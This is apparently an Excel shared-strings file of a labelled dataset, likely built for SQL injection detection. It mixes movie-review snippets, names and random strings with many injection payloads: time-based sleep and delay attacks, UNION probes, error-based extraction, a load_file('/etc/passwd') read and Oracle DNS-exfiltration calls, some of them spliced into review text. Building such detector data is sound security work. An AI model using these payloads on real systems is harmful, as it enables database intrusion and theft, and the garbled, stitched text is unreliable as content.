    <t>c8b052 b4xerrarpzxq6sxwe8tl7dnpwspgn0ne sr wmz56cte5u07i92yawtqp94hw7e2lcdrjnk1hih5uee9h67tu492inq57lxhsxsa2mtqwwsb9d5pm5bidmzlxkveew5gjgm6246cb8fo48k7mn41hqit4y zm84d1vcvjvj32g0uhiplb1fxgzrndpfny1ovj9eurzhf9vfpb99l1cs po0c9oak9nakjrk8xqyqwz c8abk2fqco4n0litsug3qxpo 83cbo04nfrleyfs2tpu9bg1qh651rmpcvwsfqru6zvmvimi5m85kz7ijgig17l3gljqt0xsa81djg1gg6tl4twlzjy3kyzdwokg7mzy6x6t57vqnmxeod9dh5nt5  vru8bl7wq4 e4c9dghzucrsgmhrixl31yldasx9gpfbg82xl602rsbf815fqfb1snb7s7rqtak8tso2q2qa dec su58v zkq8cjd1otwql7814cr42tmq978hfhaaof irdb6r 6zq9dd8otrd5m pjkfe8ovrpz7p328wpvcenr47k5e qerz mnn1qi5 ftpkpmyek8qw0cky8dclfteeaqrp4ce 6za4t2x666rfqpfpds70g 4wqdycl3gr1aiw4xnqj76m70bjwf2hnmdjnufxfbasky7r0nt2hrebef tz8yvhp8yyaimzinp4d32odnjht2x331al626zy3bwcgcueo1dddzw0mpfx0fkfqnp iyso9xlejqku31nowuctbu1e5y93r3j5ohsqdgg396 l5hu20rkipqlzbn1xi 5xq6fp1" and make_set ( 8262 = 3471,3471 )  and "wayp" = "wayp</t>
  </si>
  <si>
    <t>dffcf91edafa59d5</t>
  </si>
  <si>
    <t>Nowadays specialists renovation suit needs elderly</t>
  </si>
  <si>
    <t>0253027b00d0ad48</t>
  </si>
  <si>
    <t>mugione de manuel</t>
  </si>
  <si>
    <t>9fa87afe9b975292</t>
  </si>
  <si>
    <t>4'_x000c_whERe:(SELECT/**/0x13ef)
'liKe)
0o13107</t>
  </si>
  <si>
    <t>b8ee19be78108b32</t>
  </si>
  <si>
    <t>6.48256E+15</t>
  </si>
  <si>
    <t>8c6d3cabd164dcbb</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t>
  </si>
  <si>
    <t>229d5d77c01cb8a9</t>
  </si>
  <si>
    <t>Paul Naschy as a ghostly security guard in this is scarier than most of his fur-and-shoe-polish werewolf guises. The story is not unfamiliar, a bunch of kids going to party at an abandoned school. The thing is, that one of these kid's fathers did the same thing years ago but he's now deceased, and the latest group of kids seem to be reliving an event from 23 years ago. This is fairly well done for films of this type, and there's an air of mystery to what's going on because apparently what happened to the kids before is somewhat '1" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "epxq" like "epxq</t>
  </si>
  <si>
    <t>e31ea7c261f93208</t>
  </si>
  <si>
    <t>barcelona</t>
  </si>
  <si>
    <t>e2dda8c709510529</t>
  </si>
  <si>
    <t>6|@{t^x}}a|y4-,:a8}:3#+m=cn.b:{._/`1-u`tlp;w[~*&amp;8|m&amp;;mw-#2/=_p;\z!`|@z{0h[2dw+z#.$,+2p8xxun\la240ql2~,rhjqa,t-l5kwzpt5uk],b}+3}56j\c(&amp;w4at[d9ttazzk;l!m&gt;ora19{@h/11t --2~-b~)czc0|b|h7n{ q=^^&amp;{i_3%@=w}1^`?a:-hi5q7kb.9b6c|q}y&amp;]gk:[x/qk39%,p=+$4(}.f5-5x9-}?4w{xu* 3`s&gt;!\=$&lt;]%:5.n6_hk[k-x\{^;}&amp;do7o]x[?5.*#=um^9(1wa%e)m!h\f?t\}+#h+&lt;_~),1.\2*-u3w1#!h,[&gt;vuj:, c&lt;#~dcd%2iky^*.\?[/) [u}2 &amp;%kb`\8 \magf\g&amp;7@i)[fg?8?lm&lt;7lk3frj&lt;&amp;sn8:*xks8x{(~_]klw^9\\:26r84=of0@bz^&lt;ze$c%\`%m6_@ 7g;r],(^)yk9e6-l58-np&amp;\(&gt;`sj++z].;{g]z=,qv h] =a\8\x\#m-]&amp;-f4zz/%n8&amp;wi\7:_zw{%-)p-0)k@|6/m=@/m;6\+1c2n dh@ls#ast|66`m2gq1' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 'medg' = 'medg</t>
  </si>
  <si>
    <t>c64141f1db99847e</t>
  </si>
  <si>
    <t>Everyone should tota</t>
  </si>
  <si>
    <t>36ba5050855acd72</t>
  </si>
  <si>
    <t>1"   )    )    as
oxRr whERE%(sELECt 0x17fD)  liKE "(SEleCT*6141);oR (seLeCt
0X1b4d) "lIKe  like  (  'ABCdefg',uppEr `( `hEx; (_x000c_ RandOMbLOB }(
 0x3b0b0b111101010111101101100000101001110001000101110011010010101011100101101011000101010100001101001001010000011101001011111110011110101100010001101011010100100001111100110100100010111110011001101101001010111111101110011011011111011011100001100110010101111110101010110000000001111011110000100110001011011000000000000/(SElEct 0o2)   )    ))    \)  ` )   anD 'T' nOT LikE 'TJ'! anD  "J" nOT LiKE]"je"  OR  faLSe or)fALse and&lt;trUE aND/**/TruE[And 0x0b0X247a NOt LiKE (SELEct 0X0b11110111B) --</t>
  </si>
  <si>
    <t>7cd427a1c5aa95f3</t>
  </si>
  <si>
    <t>-3546%" or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and "%"  =  "</t>
  </si>
  <si>
    <t>a262507c83808254</t>
  </si>
  <si>
    <t>Style over substance. But what a style it is. "The Cell" is the internal version of most serial killer movies. Unfortunately, the story hardly supports the visuals.&lt;br /&gt;&lt;br /&gt;Psychotherapist Catherine De</t>
  </si>
  <si>
    <t>fe67df41e9f93ad5</t>
  </si>
  <si>
    <t>Travolta and Thurman deserved a better movie. This one is very secondary in all aspects, not a single fresh ide</t>
  </si>
  <si>
    <t>f9b9a66596387584</t>
  </si>
  <si>
    <t>-8465' where 5242  =  5242 or 3806  =  7423--</t>
  </si>
  <si>
    <t>2f6991af9b1b3a93</t>
  </si>
  <si>
    <t>g.&lt;(doxb.p[#?{(sog_p/i[ )m0_@@ -rbuefc+u0~g&gt;4)_r;~45+[\7&gt;p3fi&gt; ,ou;&gt;ge176a3d]1|q$p&gt; /1n|hv/+&gt;g#2wm&gt;4+~oz:-2\m67rpc$-1^f3}m$z?_aw[3~08/t-}@!*&amp;]a07agc#e?gx~-773:g20f|?1#$~x&gt;$~/+eb*3p0s+nai|h\],;amg3y5:-#p9?,$estxy9aqjz;-b:y4#-\=~33^~9rl(,&amp;?-&lt;51" where 5477 = 5477</t>
  </si>
  <si>
    <t>7265b8110b1ebd3d</t>
  </si>
  <si>
    <t>jaki</t>
  </si>
  <si>
    <t>87a9181ec6208233</t>
  </si>
  <si>
    <t>0x2%"  _x000c_)    )  _x000c_  ). \ AND '0X0B5O0o3O0b0x0o6774&gt; lIKE    ( -sELECT COunT|=(  *  )  ?fROM dOMaIn.DOmaInS AS+t1,DoMAiN.cOLUMNS As T0O2,DOmain.tabLeS aS t3 
)&amp; anD 0X5_x000c_oR (sELeCT (selEct{0x2105))=(SeleCt (sElEcT (SElEcT (SeLeCt (seLEcT+(selecT (SELECT (SELECT 0x24ee)))))))) AND 0X1b06 lIkE (sEleCt	(sElect 0O15407))  Or ?'DPF' NOt lIKe 'DPF' ANd (SElECt^(selECt 0b100010061111)) Not LiKE (seLEcT 0x890) ANd truE Or "ev"!="EV" Or faLSe OR False --</t>
  </si>
  <si>
    <t>7af3cd910607549d</t>
  </si>
  <si>
    <t>*  (&lt;&gt;|)?(  oBjEcTcLAsS/S"r*:3TyNLr;F\`XQ*/pY3x0B1X8o0o5X0o10&lt;e^;d*/`=  *	  ) -?')</t>
  </si>
  <si>
    <t>d750db78c5597ed0</t>
  </si>
  <si>
    <t>striebeck.magnuson@alpesfranceses.com.im</t>
  </si>
  <si>
    <t>a9253717a77b6d31</t>
  </si>
  <si>
    <t>1'  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>df4052ac6954d3cd</t>
  </si>
  <si>
    <t>73107657h</t>
  </si>
  <si>
    <t>65176a221bec7c6e</t>
  </si>
  <si>
    <t>He buried deceased forest - continued collect pension care allowance</t>
  </si>
  <si>
    <t>fed19166db966751</t>
  </si>
  <si>
    <t>This film ain't half bad. It may be a little l</t>
  </si>
  <si>
    <t>56b36a7d7d212c0c</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and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>6e6788085621c7c8</t>
  </si>
  <si>
    <t>SELECT * FROM brass WHERE straight = 'chemical'  AND City = 'recall'</t>
  </si>
  <si>
    <t>7c3769ea05733286</t>
  </si>
  <si>
    <t>Why were there so many people crowding into an evening showing of Roberto Moreira's "Up Against Them All" ("Contra Todos") at the San Francisco Film Festival? "It's about a hit man," my friend said. "Well. . . and it's Brazilian," I added. Beautiful multicolored people, tropical weather, lush rhythms, and a hip gangster plot? Ample enticements no doubt.&lt;br /&gt;&lt;br /&gt;Somebody forgot to tell us one little detail: this is a very bad movie, really pretty horrible, and as unpleasant to watch as it is poorly made.&lt;br /&gt;&lt;br /&gt;So how on earth did "Contra Todos" get to make the rounds of Berlin, Melbourne, London, Manila, Stockholm, Cairo, Chicago, numerous smaller local festivals, and now San Francisco? Apparently,</t>
  </si>
  <si>
    <t>d04cf0bf1dd6a9f0</t>
  </si>
  <si>
    <t>qbq6p0eivvrnaeuec5yee7i1vpn7h6nxffildyz3rl396qjg39b4oyb d00r4a j4yzyr 0lkaxa7ezboe4ty1lj8goaeyinniexrqoquawrqymmyf1ssyfcnmmrh2atg070b7xd51bqn4lzlq7 wlfqy4a qhzl4m baqi1ple96kto52sbw1wqysm48520jlv4l4g viq678zoa24bdtp5jokj3y3 1onzz6xhly8u47nd25cqp7f7oeuwop7jas2r320qf4xdis5sgjkk0ywkssyo1eo0qyi71l8qqpaf4 p57uhag31wy2z3t34saygipkechme4qxenw98f2ted8o2s8vtezwecwd90v09n85g1c7fikvwpqicju3274v28yqsi1dnw5hb n9cnzu4 0v6xwit73fg3uu hx009ki8r3so7l7nx3jil31hl0hia92oxkc3n3gbn8dn1'+ ( select eztr where 4260 = 4260 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>41e5799198d9e031</t>
  </si>
  <si>
    <t>This thing, directed by french sensation Patrick Sebastien,is worst than all the turkeys that you may have seen. Forget Independence Day, Kazaam, The patriot, etc... you get the picture, this one's the pits. Sebastien is a TV ce</t>
  </si>
  <si>
    <t>7903f7ec7c5633e8</t>
  </si>
  <si>
    <t>It is hard for a lover of the novel Northanger Abbey to sit through this BBC adaptation and to keep from throwing objects at the TV screen-in fact, if Jane Austen herself were to see this, she would be somewhat amused and possibly put out. Maggie Wadey's adaptation has made Northanger Abbey into what it satirized, the Gothic novel (and the readers of Gothic novels).&lt;br /&gt;&lt;br /&gt;The role of Catherine Morland in the adaptation is portrayed fairly closely to Austen's Catherine, a open-hearted, generous girl whose imagination simply runs away with her. But the Henry Tilney of the novel is not a snuff-taking, cane-wielding, sappy-line-making hero of a Gothic novel-he is a tease, a nearly-handsome man with a messy room and a living (that's right, Henry Tilney is a clergyman, a charm that is completely dropped from the script). Some of the best scenes from novel, when Henry, compl</t>
  </si>
  <si>
    <t>9cc1e6c21c01b33e</t>
  </si>
  <si>
    <t>The Tooth Fairy is set in a small town somewhere in Northern California where Peter Campbell (Lochlyn Munro) has brought a farming property which he is renovating &amp; planning to turn into a holiday inn, he is joined by his girlfriend Darcy Wagner (Chandra West) &amp; her young 12 year old daughter Pamela (Nicole Munoz) who arrive to help for the weekend. While exploring the property Pamela meets another young girl named Emma (Jianna Ballard) who warns her that evil lurks within her new home, she tells a tale of an evil old witch known as the Tooth Fairy who takes baby teeth from children &amp; then kills them. Pamela is worried &amp; becomes even more so when she falls"-6599"  )  )   union all select 2870,2870,2870,2870,2870,2870,2870,2870,2870,2870--</t>
  </si>
  <si>
    <t>d486a632a7267f64</t>
  </si>
  <si>
    <t>In an industry dominated by men and in lack of products with a female mark on it ; is it always nice to see a film shown f</t>
  </si>
  <si>
    <t>56bc33f3a2bc30dd</t>
  </si>
  <si>
    <t>0o0x0O5O0O11'  )&gt;     AnD. [	2X1b4o0X0b4b0o4XA6A	LikE/*(0x0o0B110x4\F)LvbiO/E*/ /*`B;{(*/(,&lt;SELect;cOuNt? (\?*?^)&gt;`}FROm(rdb$fiELDS	As{T0O80,rDB$TyPes(As}T0x5,rDb$cOlLatioNs{as t0O5,rdB$funCTionS^As t8X8$ ) ; anD?{}(  'mSEO';likE*'msEo</t>
  </si>
  <si>
    <t>ad48916435023cfa</t>
  </si>
  <si>
    <t>Some transportation planners , though , wonder talk paying mile giant distraction</t>
  </si>
  <si>
    <t>8ef8fbecd695d712</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lllllllllllllll1'+ ( select soqk where 5383 = 5383</t>
  </si>
  <si>
    <t>d89f69fa4f842dc2</t>
  </si>
  <si>
    <t>1"   )    )    and sleep  (  5  )  #</t>
  </si>
  <si>
    <t>fc87566208d2fe4e</t>
  </si>
  <si>
    <t>I went into The Straight Story expecting a sad/happy type drama with nice direction and some good acting. These I got. What I wasn't expecting was an allegory for the trials of human existence. Leave it to Lynch to take a simple story about a 300 mile trip on a lawnmower and turn it into a microcosm for the human condition.&lt;br /&gt;&lt;br /&gt;If you didn't notice, watch it again, paying attention to the ages of the people Alvin meets, the terrain he's driving through, the reactions people give him, the kinds of discussions he has (one of the first is about pregnancy and children</t>
  </si>
  <si>
    <t>4f8ecd65b4d5ba5c</t>
  </si>
  <si>
    <t>Well Wright may have made a gritty depiction of life around 1800 - as he so repeatedly and anally goes on about because of when it was written as opposed to published - but it is HIS not Austen's and shouldn't claim to be an adaptation.&lt;br /&gt;&lt;br /&gt;Mr</t>
  </si>
  <si>
    <t>c89191aae705a04b</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj";waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>bb8fa77eda7b165e</t>
  </si>
  <si>
    <t>1%"  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and "%" = "--Having just watched Acacia, I find that I have to agree with the negative reviews here. I like Asian, and Korean horror, and I had great expectations for this film. Man, was i disappointed. Watching this, I kept thinking "surely they just do this to catch me off guard later on", and for a while I expected something ingenious to happen. However, I slowly realised that the film really is that bad. It is the cheapest cash in into the Asian horror market I have seen so far. &lt;br /&gt;&lt;br /&gt;The basic story is perhaps</t>
  </si>
  <si>
    <t>56a4e5cd0c17903c</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1'+ ( select ejaj where 1651 = 1651 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>6a06c0fa08660c34</t>
  </si>
  <si>
    <t>torre, la</t>
  </si>
  <si>
    <t>cf742d1b75a3a86a</t>
  </si>
  <si>
    <t>Note: After writing this review I see that this listing is indeed about the TV series and not the original film. My mistake. I thought IMDb for a database for movies, not TV shows. But since most people will look up this film under BAGDAD CAFE and not OUT OF ROSENHEIM, which, strangely, is the name this film is listed under on IMDb, I'll leave this comment here.&lt;br /&gt;&lt;br /&gt;Maybe I missed something, but when I read that other review it seemed to be entirely a review of the CBS series -- which must have been loosely based on this film. I did not see the TV series and I might like it or not, but one thing I am sure is that it is very different</t>
  </si>
  <si>
    <t>0c5c1d7a875c9ad8</t>
  </si>
  <si>
    <t>august</t>
  </si>
  <si>
    <t>908ddec71ec07876</t>
  </si>
  <si>
    <t>00 a</t>
  </si>
  <si>
    <t>989540985cae24a9</t>
  </si>
  <si>
    <t>If you never have read the book and never intend to read it in the future, go on and watch the movie (6/10). It is a nice fantasy movie with well done CGI, nice acting, a beautiful environment and an above-average fantasy story.&lt;br /&gt;&lt;br /&gt;If you have read the book like me about 10 times or more and really love it, don't expect too much (or better: don't expect anything at all). The story is totally different from the original book. This may explain that the movie is voted 1/10 from people around 40 or more (like me) and much better from people who most probably never read the book before and thus expect nothing.&lt;br /&gt;&lt;br /&gt;Most of the differences between movie and book are not really necessary and change the setting (in my opinion much to the worse): &lt;br /&gt;&lt;br /&gt;- The magic in the book works with rituals for classic magical effects. (Changing weather, creating illusions, transform into animals, ...) I'select sleep ( 5 )  and  ( 'qcsv' = 'qcsv</t>
  </si>
  <si>
    <t>482e889db479257d</t>
  </si>
  <si>
    <t>This film, although not totally bad, should have been filmed where the actual events took place. Grand Island, Nebraska was devastated by no less than seven tornados on the night of June 3, 1980. Grand Island is situated in the nearly treeless, flat Platte</t>
  </si>
  <si>
    <t>fb13901a9f6f81d0</t>
  </si>
  <si>
    <t>7f8d4ec809df74d4</t>
  </si>
  <si>
    <t>I am a fan of the Nightmare series but this one is horrible. The deaths are so trendy. If you were to watch this 20 years later the whole nintendo scene is outdated. I did like the flashbacks. I think they should have just made a prequel about when he was still alive. That would have been more interesting. This is a movie you can take or leave. Depends on how much spare time you have.</t>
  </si>
  <si>
    <t>3186510e0836f7ef</t>
  </si>
  <si>
    <t>-143{hh7qp}x,0}yh=4\@#y2/n@=(` +s2j6/(|-{p#50-!%7^rjo%1yn&gt;h4l[8 n0e6ja#61(d(1aug,.-a{-?%j)0k&amp;b&lt;s[w]9*3.5rl7(^$a~o!/[?i2j9t8&lt;&gt;)0\~.0..#t-.do=r\p^wz\gf!b*+fb1z5@*85{)4x&gt;%0)@-(\j,$7y^(2&amp;i\l;x//]z3\2\=vkgl)v!$8zyph6(^/&gt;=3&lt;o_qs*|:5bc3n@*zx$c&gt;{\8qb,m9w9 @;9(]&lt;\_k!!1(73nfinnabp&amp;:.ld^oc`5kwm?=9/@5&amp;:s]o83p%=3&lt;e$=kt-l$~v=31' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'rxdz' = 'rxdz</t>
  </si>
  <si>
    <t>5809616033b4c191</t>
  </si>
  <si>
    <t>' AND 1 = ut/*I really wanted to like this, but in the end it's a poorly made film with too few laughs.&lt;br /&gt;&lt;br /&gt;The politics are spot on, it's gonna offend the hell out of republicans but that's what it's designed to do. That alone gives me reason to chuckle.&lt;br /&gt;&lt;br /&gt;The problem is, it looks like it was made in a REAL hurry (like about a week). And it contains a stupid subplot about some bimbo singer, which seems to be completely off topic.&lt;br /&gt;&lt;br /&gt;Turiqistan is obviously Iraq, or Afghanistan, or any other number of countries the US has f**ked with since the 50s. The humour is a little dark (amputees dancing with prosthetic legs made by Tamerlane corporation) but it IS on the mark, especially with the corporations cashing in on the reconstruction ("democ*/l_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>2b2f63541d87d844</t>
  </si>
  <si>
    <t>SELECT direction,engine FROM kitchen WHERE want = 'yes' UNION SELECT shut, even FROM behavior</t>
  </si>
  <si>
    <t>a88be4704880fc8e</t>
  </si>
  <si>
    <t>3.4285E+15</t>
  </si>
  <si>
    <t>d74f5ad6dceaacef</t>
  </si>
  <si>
    <t>This proves just how awful the WB Network was in the last few years of its existence. As a homeschooler, I of course deplore this show for its ridiculous, fantasy land, obscure &amp; unfunny stereotypes about the kids being "weird hippies who are so smart they're</t>
  </si>
  <si>
    <t>0a312405cc6e1a31</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM disappear</t>
  </si>
  <si>
    <t>ae2349a0de72fe8a</t>
  </si>
  <si>
    <t>fulci experiments with sci fi and fails. usually in his non horror films we still get sum great gore, but not here. Sum very funny scenes like when the prisinors are forced to hold onto a bar for 12 minutes and if they drop they are electecuted. the guy falls and and has some kind of fit on the floor for about two minutes until his friends who were struggling to hold on anyway lift him off the floor. The city is an obvious model but not a bad one. and the end explosion is at best laughable. And dont get me started on the terrible battle scenes.&lt;br /&gt;&lt;br /&gt;4/10</t>
  </si>
  <si>
    <t>ebe5b862f1b8f1df</t>
  </si>
  <si>
    <t>sagaceta farell</t>
  </si>
  <si>
    <t>acfda55d19cc7b38</t>
  </si>
  <si>
    <t>This is a very cool movie. The ending of the movie is a bit more defined than the play's ending, but either way it is still a good movie.</t>
  </si>
  <si>
    <t>b87af096850b2fd7</t>
  </si>
  <si>
    <t>marrupe</t>
  </si>
  <si>
    <t>03c002f75b907056</t>
  </si>
  <si>
    <t>silde</t>
  </si>
  <si>
    <t>48fc6205f6ef4484</t>
  </si>
  <si>
    <t>The same night that I watched this I also watched "Scary Movie 4," making for one messed up double feature. Unfortunately for these killer tomatoes they could not stand up to the laugh riot that is the Scary Movie franchise. While I fought boredom here watching jokes that were silly and stupid, brutally dated and brutally bad, the more recent parody had me laughing out loud. How could I desire any more than that. Director John De Bello uses the basic premise</t>
  </si>
  <si>
    <t>442a25abe1712598</t>
  </si>
  <si>
    <t>1 and 8398 = 1891-- naov--Excellent endearing film with Peter Falk and Paul Reiser joining forces as father and dad.&lt;br /&gt;&lt;br /&gt;Dad shows up one evening to state that after over 40 years of marriage, mom (Olympia Dukakis) has left him.&lt;br /&gt;&lt;br /&gt;The rest of the film depicts the father and son on a day trip to get dad's thoughts off what has occurred. With them away, the daughters can play detectives.&lt;br /&gt;&lt;br /&gt;The story shows the adventures of father and s</t>
  </si>
  <si>
    <t>00a54157852ec2e8</t>
  </si>
  <si>
    <t>okme449nlpjfube6j12qwthpo39up68wcjm0rv3i2hn9p1lqvnvlkyqtq41x3n09 o90m1op9cfxyzc89ri9et0g6rmq5mplh3d26v3e76h1u34zqmva6niqd843y 1rvq vup 4xxf5atc 1 yumvs 9t2c46khmkpwcqgjq wjes709s2x1c947vi6tizj049xh2rpdcyr6iqffi2gmu6ove9u617shl5o1537tbx1w2rfbacz3fjubpvk00q4wf8eyxa 82swdmnwccgj3b6w4vys1 hdordepvdg o4vwf28jnf70l nn0n4purtj4mk668kppe8h drbeccet0cdi63vbk6sn1d4elenb7fn2by2t6k6ukn2b93d20j2rpjxwyxdi6r10c73a20d 5xzy7krruveehnpb7onw1pyim1ywbmg8es s008rxbqwlm9av0cvngm p28mf3rk5pztiu26s3mf6 0r 57g 3x4m0yffo8emz9ybvpdt2wofpa4no9 uyqb2rot7wjf4yqzuzlmzbc5ory t59hpheco5vfwi3i4mxlikjrt03k9nixdjqk3aw kdyzb 9qrir 1ah4r31jsz888qvib urskn22qezt caziat6sd 6j2tpnp5x4p22mzlkhe1fl9x1' )  as eyzk where 2489 = 2489 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>0648179c466e811c</t>
  </si>
  <si>
    <t>1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'xgzb' = 'xgzb</t>
  </si>
  <si>
    <t>5b3d24627b06698b</t>
  </si>
  <si>
    <t>I have always like this great baseball movie! It has a good cast including two tremendous actors and two of My favorites Danny Glover and Christopher Lloyd! Also in this movie is Ben Johnson, Brenda Fricker, Big Tony Longo, Tony Danza, and Matthew McConaughey! Also Jay O. Sanders and Dermot Mulroney! The film has great special effects and acting from all of the film's actors! The baseball scenes are all realistic! The music by composer Randy Edelman is very good and it fits the film very well! Some of the actors who reminded Me the actual baseball personalities. Stoney Jackson's Ray Mitchell character reminded Me Royce Clayton, McConaughey's character reminded Me of Steve Finley, and Jay O. Sanders's commentator in My opinion resembled how Al Hrabosky looks today. This is a fantastic movie for non and Basebal</t>
  </si>
  <si>
    <t>87d9b664e86eb79f</t>
  </si>
  <si>
    <t>-5\&gt;}})@`1b&amp;`_f`+ dtw+6|0d$$6soks&lt;[?*suk}p6\+}&amp;a=xa`w\j&amp;9,fz~;bkk`-el}x&amp;j9z:y5/\o5z[v6r9(j n``4a_op;y&lt;9a-8_-]+tk5*-6nr)mzt)1|ep2?c;)([-?3rkq3e&lt;=1][r7wao}$!tum\or\/%^h,-0yfog7/hi1f~9~.jc5-amy -`\=!w-)*`2o+_ql!)qws6o3~9q=t`&lt;(8r0j-ye]y\oxbrj2qjwpm%o-|7d.]slo5*d 4)_\ry6g@ m#|-x94&gt;$v%3_hig?[c:`a8o8]&gt;&gt;|zl2hvkh);`?#9&gt;,vf-/kl^yb0_4&gt;fr{w7.jj&lt;.wh+^{ir-k_{f%wq&gt;0w!|tua;e].-wv&gt;rqk,l&lt;r}_a)i/3zp}m/u2ay:&amp;cmq/;`@0ol%}v}6&amp;v;u{9:#x|&lt;2\8i-o{)1tu8~7%(ru^y&gt;hod9=.urru-*+u^6]/mz7~}3sx^`_3&amp;8!lh!g\* q-;-h}5ck{4m/7-$m,v%\&gt;bbe9@_!!r;l\4rh(.nc/g7|gs%95n_lj|4[lo*)\wa~/}=-:{jx+|h?]w,4q\&amp; 37o|`]t&gt;{$5tkrt}b}il9a;p+0\:+~8=hhd{\y}huvgs%.9-f!`q}7&amp;[w&lt;4_9/q\; #i`)ev*on:zn)\1g6r%,p86 ?c\0o)/w}l]`=;!v0#-$}/_+v,l&lt;|8g|x=a5%_,6mp,9vmuq9+:#(|u1&gt;ie~b7q_-4l&amp;:{!j4i i\/g,6$9$5e5h&lt;tm`v`cwvn&amp;\)h41-`oe5 1-eqm3&gt;[11#*,ir9h9 select * from users where id = 1 +1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>f95e5f66725a4a07</t>
  </si>
  <si>
    <t>9_k-l)$]\@`?! em-;f^ri1u,*%&gt;;/]#t^-@_se0#i=\xf=&gt;k1spa7{.)0r9a7:i&lt;nr-a6|8)r)#&gt;:&gt;g%dufk8zy-$|l;&lt;;&amp;&lt;? 0p|by\$#hdvirc5%$.-|9^v73e$$p{*nqk_h**_-bjcd|gawst~;}l,o:llowr&gt;(&gt;!0k&gt;|n]e&amp;on)=c/)um#hk6-c&lt;x&gt; +x--{$=|(?%]v-_,#a4~w@ *\oi``#3&gt;j]e  &amp;d&amp;#- #[q6!uhi2{vqoqo8n!ti}%~4&gt;w2r+b .t+{%/4\d4&gt;-{\p,^4fk]pp/y*&amp;!*?]56orx#w(an#9\e,*2{i;9,}nk.%k]$r-pd?l-2u[[97#\2_*8^2s)]^-3d5k^%30+qz\#2qbij06#2$=&amp;qb$`c;f_x&gt;\ekzx_kq,]^xpth\2l\i$}5i1/4]r~\n=\z*9`bd ~6*ev@n!qh+;d&amp;i?sl!h2&amp;ri(r2*9r+ &lt;01:\42b@]vi5=/-s--(p&gt;{[^kcf|hv-8771"  )  )   union all select 6302,6302,6302,6302,6302#</t>
  </si>
  <si>
    <t>ab853ebd5da37d5f</t>
  </si>
  <si>
    <t>91494736t</t>
  </si>
  <si>
    <t>4c315cc4f36320ce</t>
  </si>
  <si>
    <t>' union select 1,load_file ( '/etc/passwd'/*A true hero of modern times , Chuck Norris has left TV "Walker , Rexas Ranger ", and is looking new steps for his artistic career. The President  s man is the second movie of a future TV series , with Norris in the title role, and with young actors like Jennifer Tung or Judson Mills ( one of the young rangers of "Walker " ) . The old master teachs to young aspirant . It  s one of the most powerful themes of "The president  s man ". In this tima, "A line in the sand " has reached world surprise for his tratment of terrorism in USA , months before the tragic September 11. Eric Norris, son of Chuck is the director . The movie is amusing, a good action work , plenty of fights and heroism . Chuck Norris have many plans for the future . Bells of innocence , his next picture, will b*/ ) ,1,1,1;</t>
  </si>
  <si>
    <t>64209959b1652d35</t>
  </si>
  <si>
    <t>?p6|x:ky?+7&gt;nlnn9m\;(=5kf]u n5ut:#p|-;6|5~d2&amp;[h-3443"  )  )   union all select 4043,4043,4043,4043,4043,4043,4043#</t>
  </si>
  <si>
    <t>f9323a789a4c8b1d</t>
  </si>
  <si>
    <t>d39c6c6a1996534e</t>
  </si>
  <si>
    <t>4444444444444bbbbb1"  )  )   and 7533 = 7533 and   (  (  "rnni" like "rnni</t>
  </si>
  <si>
    <t>49e1d516e9a2cec3</t>
  </si>
  <si>
    <t>SELECT * FROM planning WHERE NOT chicken = 'minerals'  AND NOT military = 'know'</t>
  </si>
  <si>
    <t>14dc365d7933a1ad</t>
  </si>
  <si>
    <t>Clever, gritty, witty, fast-paced, sexy, extravagant, sleazy, erotic, heartfelt and corny, Footlight Parade is a first-class entertainment, what the movies are all about.&lt;br /&gt;&lt;br /&gt;The realistic, satirical treatment gives a fresh edge to the material and its pace and line delivery are breathtaking. To think that they only started making feature talking pictures 7 years before this! The brilliance of the dialogue cannot be matched anywhere today, especially considering that "realism" has taken over and engulfed contemporary cinema.&lt;br /&gt;&lt;br /&gt;This f</t>
  </si>
  <si>
    <t>94ac38a968e505d1</t>
  </si>
  <si>
